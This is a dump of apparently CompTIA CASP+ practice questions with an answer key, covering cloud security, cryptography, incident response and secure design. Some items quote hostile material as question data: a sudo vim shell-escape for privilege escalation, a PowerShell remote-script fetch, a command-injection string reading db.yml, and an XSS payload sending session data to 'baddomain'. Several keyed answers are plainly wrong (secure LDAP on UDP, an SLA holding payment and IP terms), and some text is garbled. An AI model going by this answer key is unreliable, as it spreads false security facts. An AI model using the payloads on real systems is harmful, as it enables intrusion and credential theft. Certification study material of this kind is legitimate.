1-100

Question 1

A company plans to build an entirely remote workforce that utilizes a cloud-based infrastructure.
The Chief Information Security Officer asks the security engineer to design connectivity to meet
the following requirements:
- Only users with corporate-owned devices can directly access servers hosted by the cloud provider.
- The company can control what SaaS applications each individual user can access.
- User browser activity can be monitored.
Which of the following solutions would BEST meet these requirements?
A. IAM gateway, MDM, and reverse proxy
B. VPN, CASB, and secure web gateway
C. SSL tunnel, DLP, and host-based firewall
D. API gateway, UEM, and forward proxy

Answer 1

B. VPN, CASB, and secure web gateway

Question 2

During a system penetration test, a security engineer successfully gained access to a shell on a
Linux host as a standard user and wants to elevate the privilege levels.
Which of the following is a valid Linux post-exploitation method to use to accomplish this goal?A. Spawn a shell using sudo and an escape string such as sudo vim -c `!sh’.
B. Perform ASIC password cracking on the host.
C. Read the /etc/passwd file to extract the usernames.
D. Initiate unquoted service path exploits.
E. Use the UNION operator to extract the database schema.

Answer 2

A. Spawn a shell using sudo and an escape string such as sudo vim -c `!sh’.

Question 3

A systems administrator is in the process of hardening the host systems before connecting to the
network. The administrator wants to add protection to the boot loader to ensure the hosts are
secure before the OS fully boots.
Which of the following would provide the BEST boot loader protection?
A. TPM
B. HSM
C. PKI
D. UEFI/BIOS

Answer 3

D. UEFI/BIOS

Question 4

A developer is creating a new mobile application for a company. The application uses REST API
and TLS 1.2 to communicate securely with the external back-end server. Due to this
configuration, the company is concerned about HTTPS interception attacks.
Which of the following would be the BEST solution against this type of attack?
A. Cookies
B. Wildcard certificates
C. HSTS
D. Certificate pinning

Answer 4

D. Certificate pinning

Question 5

A threat hunting team receives a report about possible APT activity in the network. Which of the
following threat management frameworks should the team implement?
A. NIST SP 800-53
B. MITRE ATT&CK
C. The Cyber Kill Chain
D. The Diamond Model of Intrusion Analysis

Answer 5

B. MITRE ATT&CK

Question 6

Device Date/Time Location
ANDROID 1022 01JAN21 0255 38.9072N,77.0369W
ANDROID 1022 01JAN21 0301 38.9072N,77.0369W
ANDROID 1022 01JAN21 0701 39.0067N,77.4291W
ANDROID 1022 01JAN21 0701 25.2854N,51.5310E
ANDROID_1022 01JAN21 0900 39.0067N,77.4291W
ANDROID 1022 01JAN21 1030 39.0067N,77.4291W

Which of the following security concerns and response actions would BEST address the risks
posed by the device in the logs?
A. Malicious installation of an application; change the MDM configuration to remove application ID1220.
B. Resource leak; recover the device for analysis and clean up the local storage.
C. Impossible travel; disable the device’s account and access while investigating.
D. Falsified status reporting; remotely wipe the device.

Answer 6

C. Impossible travel; disable the device’s account and access while investigating.

Question 7

An energy company is required to report the average pressure of natural gas used over the past
quarter. A PLC sends data to a historian server that creates the required reports.
Which of the following historian server locations will allow the business to get the required reports
in an OT and IT environment?
A. In the OT environment, use a VPN from the IT environment into the OT environment.
B. In the OT environment, allow IT traffic into the OT environment.
C. In the IT environment, allow PLCs to send data from the OT environment to the IT environment.
D. Use a screened subnet between the OT and IT environments.

Answer 7

D. Use a screened subnet between the OT and IT environments.

Question 8

Which of the following is a benefit of using steganalysis techniques in forensic response?
A. Breaking a symmetric cipher used in secure voice communications
B. Determining the frequency of unique attacks against DRM-protected mediaC. Maintaining chain of custody for acquired evidence
D. Identifying least significant bit encoding of data in a .wav file

Answer 8

D. Identifying least significant bit encoding of data in a .wav file

Question 9

A new web server must comply with new secure-by-design principles and PCI DSS. This includes mitigating the risk of an on-path attack. A security analyst is reviewing the following web server
configuration:

TLS _AES _256_GCM_SHA384
TLS_CHACHA20_POLY1305_SHA256
TLS _AES_128_GCM_SHA256
TLS_AES_128_CCM_8_SHA256
TLS_RSA_WITH_AES_128_CBC_SHA256
TLS_DHE_DSS_WITH_RC4_128_SHA
RSA_WITH_AES_128_CCM

Which of the following ciphers should the security analyst remove to support the business
requirements?
A. TLS_AES_128_CCM_8_SHA256
B. TLS_DHE_DSS_WITH_RC4_128_SHA
C. TLS_CHACHA20_POLY1305_SHA256
D. TLS_AES_128_GCM_SHA256

Answer 9

B. TLS_DHE_DSS_WITH_RC4_128_SHA

Question 10

A security analyst notices a number of SIEM events that show the following activity:

10/30/2020 - 8:01 UTC - 192.168.1.1 - sc stop WinDefend
10/30/2020 - 8:05 UTC - 192.168.1.2 - c:\program files\games\comptiacasp.exe
10/30/2020 - 8:07 UTC - 192.168.1.1 - c:\windows\system32\cmd.exe /c powershell https://content.comptia.com/content.exam.ps1
10/30/2020 - 8:07 UTC - 192.168.1.1 - powershell – > 40.90.23.154:443

Which of the following response actions should the analyst take FIRST?
A. Disable powershell.exe on all Microsoft Windows endpoints.
B. Restart Microsoft Windows Defender.
C. Configure the forward proxy to block 40.90.23.154.
D. Disable local administrator privileges on the endpoints.

Answer 10

C. Configure the forward proxy to block 40.90.23.154.

Question 11

A company hired a third party to develop software as part of its strategy to be quicker to market.
The company’s policy outlines the following requirements:

• The credentials used to publish production software to the containerregistry should be stored in a secure location.
• Access should be restricted to the pipeline service account, withoutthe ability for the third-party developer to read the credentialsdirectly.

Which of the following would be the BEST recommendation for storing and monitoring access to
these shared credentials?

A. TPM
B. Local secure password file
C. MFA
D. Key vault

Answer 11

D. Key vault

Question 12

A junior developer is informed about the impact of new malware on an Advanced RISC Machine
(ARM) CPU, and the code must be fixed accordingly. Based on the debug, the malware is able to
insert itself in another process memory location.
Which of the following technologies can the developer enable on the ARM architecture to prevent
this type of malware?

A. Execute never
B. No-execute
C. Total memory encryption
D. Virtual memory encryption

Answer 12

A. Execute never

Question 13

A company is implementing SSL inspection. During the next six months, multiple web
applications that will be separated out with subdomains will be deployed. Which of the following
will allow the inspection of the data without multiple certificate deployments?

A. Include all available cipher suites.
B. Create a wildcard certificate.
C. Use a third-party CA.
D. Implement certificate pinning.

Answer 13

B. Create a wildcard certificate.

Question 14

A small business requires a low-cost approach to theft detection for the audio recordings it
produces and sells.
Which of the following techniques will MOST likely meet the business’s needs?

A. Performing deep-packet inspection of all digital audio files
B. Adding identifying filesystem metadata to the digital audio files
C. Implementing steganography
D. Purchasing and installing a DRM suite

Answer 14

C. Implementing steganography

Question 15

Clients are reporting slowness when attempting to access a series of load-balanced APIs that do
not require authentication. The servers that host the APIs are showing heavy CPU utilization. No
alerts are found on the WAFs sitting in front of the APIs.
Which of the following should a security engineer recommend to BEST remedy the performance
issues in a timely manner?

A. Implement rate limiting on the API.
B. Implement geoblocking on the WAF.
C. Implement OAuth 2.0 on the API.
D. Implement input validation on the API.

Answer 15

C. Implement OAuth 2.0 on the API.

Question 16

An organization is considering a BYOD standard to support remote working. The first iteration of
the solution will utilize only approved collaboration applications and the ability to move corporate
data between those applications. The security team has concerns about the following:

• Unstructured data being exfiltrated after an employee leaves theorganization
• Data being exfiltrated as a result of compromised credentials- Sensitive information in emails being exfiltrated

Which of the following solutions should the security team implement to mitigate the risk of data
loss?

A. Mobile device management, remote wipe, and data loss detection
B. Conditional access, DoH, and full disk encryption
C. Mobile application management, MFA, and DRM
D. Certificates, DLP, and geofencing

Answer 16

C. Mobile application management, MFA, and DRM

Question 17

A Chief Information Officer is considering migrating all company data to the cloud to save money
on expensive SAN storage.
Which of the following is a security concern that will MOST likely need to be addressed during
migration?

A. Latency
B. Data exposure
C. Data loss
D. Data dispersion

Answer 17

B. Data exposure

Question 18

Due to locality and budget constraints, an organization’s satellite office has a lower bandwidth
allocation than other offices in the organization. As a result, the local security infrastructure staff is assessing architectural options that will help preserve network bandwidth and increase speed to
both internal and external resources while not sacrificing threat visibility. Which of the following
would be the BEST option to implement?

A. Distributed connection allocation
B. Local caching
C. Content delivery network
D. SD-WAN vertical heterogeneity

Answer 18

C. Content delivery network

Question 19

Which of the following are risks associated with vendor lock-in? (Choose two.)

A. The client can seamlessly move data.
B. The vendor can change product offerings.
C. The client receives a sufficient level of service.
D. The client experiences decreased quality of service.
E. The client can leverage a multicloud approach.
F. The client experiences increased interoperability.

Answer 19

B & D

Question 20

An organization recently experienced a ransomware attack. The security team leader is
concerned about the attack reoccurring. However, no further security measures have been
implemented. Which of the following processes can be used to identify potential prevention
recommendations?

A. Detection
B. Remediation
C. Preparation
D. Recovery

Answer 20

C. Preparation

Question 21

A security architect is implementing a web application that uses a database back end. Prior to the
production, the architect is concerned about the possibility of XSS attacks and wants to identify
security controls that could be put in place to prevent these attacks.

Which of the following sources could the architect consult to address this security concern?

A. SDLC
B. OVAL
C. IEEE
D. OWASP

Answer 21

D. OWASP

Question 22

A security engineer was auditing an organization’s current software development practice and
discovered that multiple open-source libraries were Integrated into the organization’s software.
The organization currently performs SAST and DAST on the software it develops.
Which of the following should the organization incorporate into the SDLC to ensure the security of the open-source libraries?

A. Perform additional SAST/DAST on the open-source libraries.
B. Implement the SDLC security guidelines.
C. Track the library versions and monitor the CVE website for related vulnerabilities.
D. Perform unit testing of the open-source libraries.

Answer 22

C. Track the library versions and monitor the CVE website for related vulnerabilities.

Question 23

A security analyst is investigating a possible buffer overflow attack. The following output was
found on a user’s workstation:
graphic.linux_randomization.prg
Which of the following technologies would mitigate the manipulation of memory segments?

A. NX bit
B. ASLR
C. DEP
D. HSM

Answer 23

B. ASLR

Question 24

An e-commerce company is running a web server on premises, and the resource utilization is
usually less than 30%. During the last two holiday seasons, the server experienced performance
issues because of too many connections, and several customers were not able to finalize
purchase orders. The company is looking to change the server configuration to avoid this kind of
performance issue. Which of the following is the MOST cost-effective solution?

A. Move the server to a cloud provider.
B. Change the operating system.
C. Buy a new server and create an active-active cluster.
D. Upgrade the server with a new one.

Answer 24

A. Move the server to a cloud provider.

Question 25

A company has decided to purchase a license for software that is used to operate a missioncritical process. The third-party developer is new to the industry but is delivering what the
company needs at this time.
Which of the following BEST describes the reason why utilizing a source code escrow will reduce
the operational risk to the company if the third party stops supporting the application?

A. The company will have access to the latest version to continue development.
B. The company will be able to force the third-party developer to continue support.
C. The company will be able to manage the third-party developer’s development process.
D. The company will be paid by the third-party developer to hire a new development team.

Answer 25

A. The company will have access to the latest version to continue development.

Question 26

A security analyst is researching containerization concepts for an organization. The analyst is
concerned about potential resource exhaustion scenarios on the Docker host due to a single
application that is overconsuming available resources. Which of the following core Linux concepts BEST reflects the ability to limit resource allocation to containers?

A. Union filesystem overlay
B. Cgroups
C. Linux namespaces
D. Device mapper

Answer 26

B. Cgroups

Question 27

A developer wants to maintain integrity to each module of a program and ensure the code cannot
be altered by malicious users.

Which of the following would be BEST for the developer to perform? (Choose two.)

A. Utilize code signing by a trusted third party.
B. Implement certificate-based authentication.
C. Verify MD5 hashes.
D. Compress the program with a password.
E. Encrypt with 3DES.
F. Make the DACL read-only.

Answer 27

A & C

Question 28

A company is moving most of its customer-facing production systems to the cloud-facing production systems to the cloud. IaaS is the service model being used. The Chief Executive Officer is concerned about the type of encryption available and requires the solution must have the highest level of security.

Which of the following encryption methods should the cloud security engineer select during the implementation phase?

A. Instance-based
B. Storage-based
C. Proxy-based
D. Array controller-based

Answer 28

B. Storage-based

Question 29

A vulnerability analyst identified a zero-day vulnerability in a company’s internally developed software. Since the current vulnerability management system does not have any checks for this vulnerability, an engineer has been asked to create one. Which of the following would be BEST suited to meet these requirements?

A. ARF
B. ISACs
C. Node.js
D. OVAL

Answer 29

D. OVAL

Question 30

An organization recently started processing, transmitting, and storing its customers’ credit card information. Within a week of doing so, the organization suffered a massive breach that resulted in the exposure of the customers’ information.

Which of the following provides the BEST guidance for protecting such information while it is at rest and in transit?

A. NIST
B. GDPR
C. PCI DSS
D. ISO

Answer 30

C. PCI DSS

Question 31

Which of the following is the MOST important security objective when applying cryptography to control messages that tell an ICS how much electrical power to output?

A. Importing the availability of messages
B. Ensuring non-repudiation of messages
C. Enforcing protocol conformance for messages
D. Assuring the integrity of messages

Answer 31

D. Assuring the integrity of messages

Question 32

A company wants to protect its intellectual property from theft. The company has already applied ACLs and DACs.

Which of the following should the company use to prevent data theft?

A. Watermarking
B. DRM
C. NDA
D. Access logging

Answer 32

B. DRM

Question 33

A satellite communications ISP frequently experiences outages and degraded modes of operation over one of its legacy satellite links due to the use of deprecated hardware and software. Three days per week, on average, a contracted company must follow a checklist of 16 different high latency commands that must be run in serial to restore nominal performance. The ISP wants this process to be automated.

Which of the following techniques would be BEST suited for this requirement?

A. Deploy SOAR utilities and runbooks.
B. Replace the associated hardware.
C. Provide the contractors with direct access to satellite telemetry data.
D. Reduce link latency on the affected ground and satellite segments.

Answer 33

A. Deploy SOAR utilities and runbooks.

Question 34

A company processes data subject to NDAs with partners that define the processing and storage constraints for the covered data. The agreements currently do not permit moving the covered data to the cloud, and the company would like to renegotiate the terms of the agreements.

Which of the following would MOST likely help the company gain consensus to move the data to the cloud?

A. Designing data protection schemes to mitigate the risk of loss due to multitenancy
B. Implementing redundant stores and services across diverse CSPs for high availability
C. Emulating OS and hardware architectures to blur operations from CSP view
D. Purchasing managed FIM services to alert on detected modifications to covered data

Answer 34

A. Designing data protection schemes to mitigate the risk of loss due to multitenancy

Question 35

Ransomware encrypted the entire human resources fileshare for a large financial institution. Security operations personnel were unaware of the activity until it was too late to stop it. The restoration will take approximately four hours, and the last backup occurred 48 hours ago. The management team has indicated that the RPO for a disaster recovery event for this data classification is 24 hours.

Based on RPO requirements, which of the following recommendations should the management team make?

A. Leave the current backup schedule intact and pay the ransom to decrypt the data.
B. Leave the current backup schedule intact and make the human resources fileshare read-only.
C. Increase the frequency of backups and create SIEM alerts for IOCs.
D. Decrease the frequency of backups and pay the ransom to decrypt the data.

Answer 35

C. Increase the frequency of backups and create SIEM alerts for IOCs.

Question 36

A company undergoing digital transformation is reviewing the resiliency of a CSP and is concerned about meeting SLA requirements in the event of a CSP incident. Which of the following would be BEST to proceed with the transformation?

A. An on-premises solution as a backup
B. A load balancer with a round-robin configuration
C. A multicloud provider solution
D. An active-active solution within the same tenant

Answer 36

Answer: C

Question 37

A company has hired a security architect to address several service outages on the endpoints due to new malware. The Chief Executive Officer’s laptop was impacted while working from home. The goal is to prevent further endpoint disruption. The edge network is protected by a web proxy.

Which of the following solutions should the security architect recommend?

A. Replace the current antivirus with an EDR solution.
B. Remove the web proxy and install a UTM appliance.
C. Implement a deny list feature on the endpoints.
D. Add a firewall module on the current antivirus solution.

Answer 37

A. Replace the current antivirus with an EDR solution.

Question 38

All staff at a company have started working remotely due to a global pandemic. To transition to remote work, the company has migrated to SaaS collaboration tools. The human resources department wants to use these tools to process sensitive information but is concerned the data could be:

• Leaked to the media via printing of the documents
• Sent to a personal email address
• Accessed and viewed by systems administrators
• Uploaded to a file storage site

Which of the following would mitigate the department’s concerns?

A. Data loss detection, reverse proxy, EDR, and PGP
B. VDI, proxy, CASB, and DRM
C. Watermarking, forward proxy, DLP, and MFA
D. Proxy, secure VPN, endpoint encryption, and AV

Answer 38

B. VDI, proxy, CASB, and DRM

Question 39

A home automation company just purchased and installed tools for its SOC to enable incident identification and response on software the company develops. The company would like to prioritize defenses against the following attack scenarios:
- Unauthorized insertions into application development environments
- Authorized insiders making unauthorized changes to environment configurations

Which of the following actions will enable the data feeds needed to detect these types of attacks on development environments? (Choose two.)

A. Perform static code analysis of committed code and generate summary reports.
B. Implement an XML gateway and monitor for policy violations.
C. Monitor dependency management tools and report on susceptible third-party libraries.
D. Install an IDS on the development subnet and passively monitor for vulnerable services.
E. Model user behavior and monitor for deviations from normal.
F. Continuously monitor code commits to repositories and generate summary logs.

Answer 39

A & F

Question 40

An enterprise is deploying APIs that utilize a private key and a public key to ensure the connection string is protected. To connect to the API, customers must use the private key.

Which of the following would BEST secure the REST API connection to the database while preventing the use of a hard-coded string in the request string?

A. Implement a VPN for all APIs.
B. Sign the key with DSA.
C. Deploy MFA for the service accounts.
D. Utilize HMAC for the keys.

Answer 40

D. Utilize HMAC for the keys.

Question 41

An application server was recently upgraded to prefer TLS 1.3, and now users are unable to connect their clients to the server. Attempts to reproduce the error are confirmed, and clients are reporting the following:

ERR_SSL_VERSION_OR_CIPHER_MISMATCH

Which of the following is MOST likely the root cause?

A. The client application is testing PFS.
B. The client application is configured to use ECDHE.
C. The client application is configured to use RC4.
D. The client application is configured to use AES-256 in GCM.

Answer 41

C. The client application is configured to use RC4.

Question 42

An organization is designing a network architecture that must meet the following requirements:

Users will only be able to access predefined services.
Each user will have a unique allow list defined for access.
The system will construct one-to-one subject/object access paths dynamically.

Which of the following architectural designs should the organization use to meet
these requirements?

A. Peer-to-peer secure communications enabled by mobile applications
B. Proxied application data connections enabled by API gateways
C. Microsegmentation enabled by software-defined networking
D. VLANs enabled by network infrastructure devices

Answer 42

C. Microsegmentation enabled by software-defined networking

Question 43

A company’s claims processed department has a mobile workforce that receives a large number of email submissions from personal email addresses. An employees recently received an email that approved to be claim form, but it installed malicious software on the employee’s laptop when was opened.

A. Impalement application whitelisting and add only the email client to the whitelist for laptop in the claims processing department.
B. Required all laptops to connect to the VPN before accessing email.
C. Implement cloud-based content filtering with sandboxing capabilities.
D. Install a mail gateway to scan incoming messages and strip attachments before they reach the mailbox.

Answer 43

C. Implement cloud-based content filtering with sandboxing capabilities.

Question 44

A company suspects a web server may have been infiltrated by a rival corporation. The security engineer reviews the web server logs and finds the following:

ls -l -a /usr/heinz/public; cat ./config/db.yml

The security engineer looks at the code with a developer, and they determine the log entry is created when the following line is run:

system (“ls -l -a #{path}”)

Which of the following is an appropriate security control the company should implement?

A. Restrict directory permission to read-only access.
B. Use server-side processing to avoid XSS vulnerabilities in path input.
C. Separate the items in the system call to prevent command injection.
D. Parameterize a query in the path variable to prevent SQL injection.

Answer 44

C. Separate the items in the system call to prevent command injection.

Question 45

A company that uses AD is migrating services from LDAP to secure LDAP. During the pilot phase, services are not connecting properly to secure LDAP. Block is an except of output from the troubleshooting session:

openssl s_client -host ldapl.comptia.com -port 636
CONNECTED (00000003)
…
—– BEGIN CERTIFICATE —–
…
—– END CERTIFICATE —–
Subject =/CN=* Comptia.com / Issuer = / DC = com / DC = danville / CN = chicago

Which of the following BEST explains why secure LDAP is not working? (Choose two.)

A. The clients may not trust idapt by default.
B. The secure LDAP service is not started, so no connections can be made.
C. Danvills.com is under a DDoS-inator attack and cannot respond to OCSP requests.
D. Secure LDAP should be running on UDP rather than TCP.
E. The company is using the wrong port. It should be using port 389 for secure LDAP.
F. Secure LDAP does not support wildcard certificates.
G. The clients may not trust Chicago by default.

Answer 45

D & F

Question 46

A threat analyst notices the following URL while going through the HTTP logs.

http”//www.safebrowsing- - -/search.asp?q=

x=newimage;x.src="http://baddomain~~~/session;

Which of the following attack types is the threat analyst seeing?

A. SQL injection
B. CSRF
C. Session hijacking
D. XSS

Answer 46

D. XSS

Question 47

The Chief information Officer (CIO) of a large bank, which uses multiple third-party organizations
to deliver a service, is concerned about the handling and security of customer data by the parties. Which of the following should be implemented to BEST manage the risk?

A. Establish a review committee that assesses the importance of suppliers and ranks them according to contract renewals. At the time of contract renewal, incorporate designs and operational controls into the contracts and a right-to-audit clause. Regularly assess the supplier’s post-contract renewal with a dedicated risk management team.
B. Establish a team using members from first line risk, the business unit, and vendor management to assess only design security controls of all suppliers. Store findings from the reviews in a data base for all other business units and risk teams to reference.
C. Establish an audit program that regularly reviews all suppliers regardless of the data they access, how they access the data, and the type of data, Review all design and operational controls based on best practice standard and report the finding back to upper management.
D. Establish a governance program that rates suppliers based on their access to data, the type of data, and how they access the data Assign key controls that are reviewed and managed based on the supplier’s rating. Report finding units that rely on the suppliers and the various risk teams.

Answer 47

A. Establish a review committee that assesses the importance of suppliers and ranks them according to contract renewals. At the time of contract renewal, incorporate designs and operational controls into the contracts and a right-to-audit clause. Regularly assess the supplier’s post-contract renewal with a dedicated risk management team.

Question 48

Company A is establishing a contractual with Company B. The terms of the agreement are formalized in a document covering the payment terms, limitation of liability, and intellectual property rights. Which of the following documents will MOST likely contain these elements

A. Company A-B SLA v2.docx
B. Company A OLA v1b.docx
C. Company A MSA v3.docx
D. Company A MOU v1.docx
E. Company A-B NDA v03.docx

Answer 48

A. Company A-B SLA v2.docx

Question 49

A company requires a task to be carried by more than one person concurrently. This is an example of:

A. separation of d duties.
B. dual control
C. least privilege
D. job rotation

Answer 49

B. dual control

Question 50

A health company has reached the physical and computing capabilities in its datacenter, but the computing demand continues to increase. The infrastructure is fully virtualized and runs custom and commercial healthcare application that process sensitive health and payment information.

Which of the following should the company implement to ensure it can meet the computing demand while complying with healthcare standard for virtualization and cloud computing?

A. Hybrid IaaS solution in a single-tenancy cloud
B. Pass solution in a multinency cloud
C. SaaS solution in a community cloud
D. Private SaaS solution in a single tenancy cloud.

Answer 50

A. Hybrid IaaS solution in a single-tenancy cloud